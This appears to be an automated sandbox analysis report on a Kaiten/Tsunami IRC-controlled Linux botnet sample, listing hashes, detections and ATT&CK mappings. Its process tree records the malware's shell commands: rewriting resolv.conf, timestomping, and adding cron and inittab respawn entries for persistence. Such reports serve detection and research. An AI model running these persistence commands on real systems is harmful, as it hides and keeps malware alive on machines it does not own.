kaiten | da0a6ccf8853a783f0ca2883b018add1b7743ed1730d7240eb131fdca61beead

Analysis

max time kernel
149s
max time network
146s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
29-07-2024 10:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
Size

576KB
MD5

411359b108b7250c1fe9c2a597b326b1
SHA1

38d95e93e9048b0126dcbbb7851c2fdbf99ae5b3
SHA256

da0a6ccf8853a783f0ca2883b018add1b7743ed1730d7240eb131fdca61beead
SHA512

ba54733629cadaada5056446a8fa562a34055eae7d75088893922ce8f2a70b86cb90dd5a5763d4f54d95438a2aed0cccd943789f66eb62c781018ca5c6613986
SSDEEP

12288:yxowMBurLdk/jiCQwnJdhYn8Gdz5/e/J+DljNRazOni:yvRrIjDQwnJbYrdzMJMAzOi

Score

10^/10

kaiten botnet persistence

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/655-1-0x00008000-0x001bacf0-memory.dmp	family_kaiten2

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	sh

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.6w0Bef	crontab

Reads runtime system information 4 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	crontab
File opened for reading	/proc/1/cmdline	411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
File opened for reading	/proc/version	411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
File opened for reading	/proc/filesystems	crontab

/tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
/tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
1⤵
- Reads runtime system information
PID:655
- /bin/sh
  sh -c "echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &"
  2⤵
  - Writes DNS configuration
  PID:656
- /bin/sh
  sh -c "chmod 700 /tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118 > /dev/null 2>&1 &"
  2⤵
  PID:658
- /bin/sh
  sh -c "touch -acmr /bin/ls /tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118"
  2⤵
  PID:661
- - /usr/bin/touch
    touch -acmr /bin/ls /tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
    3⤵
    PID:664
- /bin/sh
  sh -c "(crontab -l | grep -v \"/tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118\" | grep -v \"no cron\" | grep -v \"lesshts/run.sh\" > /var/run/.x00846930886) > /dev/null 2>&1"
  2⤵
  PID:665
- - /bin/grep
    grep -v /tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
    3⤵
    PID:668
- - /bin/grep
    grep -v "no cron"
    3⤵
    PID:669
- - /usr/bin/crontab
    crontab -l
    3⤵
    - Reads runtime system information
    PID:667
- - /bin/grep
    grep -v lesshts/run.sh
    3⤵
    PID:670
- /bin/sh
  sh -c "echo \"* * * * * /tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118 > /dev/null 2>&1 &\" >> /var/run/.x00846930886"
  2⤵
  PID:671
- /bin/sh
  sh -c "crontab /var/run/.x00846930886"
  2⤵
  PID:672
- - /usr/bin/crontab
    crontab /var/run/.x00846930886
    3⤵
    - Creates/modifies Cron job
    - Reads runtime system information
    PID:673
- /bin/sh
  sh -c "rm -rf /var/run/.x00846930886"
  2⤵
  PID:674
- - /bin/rm
    rm -rf /var/run/.x00846930886
    3⤵
    PID:675
- /bin/sh
  sh -c "cat /etc/inittab | grep -v \"/tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118\" > /etc/inittab2"
  2⤵
  PID:676
- - /bin/cat
    cat /etc/inittab
    3⤵
    PID:677
- - /bin/grep
    grep -v /tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
    3⤵
    PID:678
- /bin/sh
  sh -c "echo \"0:2345:respawn:/tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118\" >> /etc/inittab2"
  2⤵
  PID:679
- /bin/sh
  sh -c "cat /etc/inittab2 > /etc/inittab"
  2⤵
  PID:680
- - /bin/cat
    cat /etc/inittab2
    3⤵
    PID:681
- /bin/sh
  sh -c "rm -rf /etc/inittab2"
  2⤵
  PID:682
- - /bin/rm
    rm -rf /etc/inittab2
    3⤵
    PID:683
- /bin/sh
  sh -c "touch -acmr /bin/ls /etc/inittab"
  2⤵
  PID:684
- - /usr/bin/touch
    touch -acmr /bin/ls /etc/inittab
    3⤵
    PID:685
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:686
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:687
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:688
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:689
- /bin/sh
  sh -c "/bin/uname -n"
  2⤵
  PID:690
- - /bin/uname
    /bin/uname -n
    3⤵
    PID:691

/bin/chmod
chmod 700 /tmp/411359b108b7250c1fe9c2a597b326b1_JaffaCakes118
1⤵
PID:660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/inittab2

Filesize
67B

MD5
dd938182acc29b55c465cc0e5f7f1f5c

SHA1
c7e6a3a1fad1b5350be277b622750f60edd449dd

SHA256
caf4f973d9d7e3a6b3b5b43a2353513dc5982c2fd50b5f71d5422401a7d7e874

SHA512
3cd9918875590a4479d67441f9eaa9143b4d2f066d65dc75b9c8951828fa7ff61bbba33bbb3c276d2cc11a1c718efc47425a3a9e68a30fe5f7f9e39e4a488785

Download Submit
/run/.x00846930886

Filesize
81B

MD5
1a9f5a9ff2784de2b03f1fe6b52c3d8c

SHA1
1865ef364f9b286e2d81252b82929afd13f90424

SHA256
3116b37f5620bee4979ca6894d0f76482edc31e33b5c1463be3fadb598a0810d

SHA512
8f9d8690be6a1e32124ba8084a273bf19fe7866463f11cd6822ded804712fe0d8a80f2d21c9f31155afa80d5643b96dce051f3bb7d42d00858d4238a0fd200bf

Download Submit
/var/spool/cron/crontabs/tmp.6w0Bef

Filesize
277B

MD5
28fafca968f70fda65bfaef16cb2c8b2

SHA1
0ca480733656ec5d9ccf635107cd63620c4136c6

SHA256
c73fc4e5d0cc8f92e213e55dafebe0b7c355d34225fd14e50a5520d8a1104b39

SHA512
8ff33fbdd142997e480380900cf3f2fbfd81c3e3b3684413d27bebf4a4574ce4dfef306c452d3868c92c4ff8085f9fe6c6320c6a46126b153d45515efff65a85

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads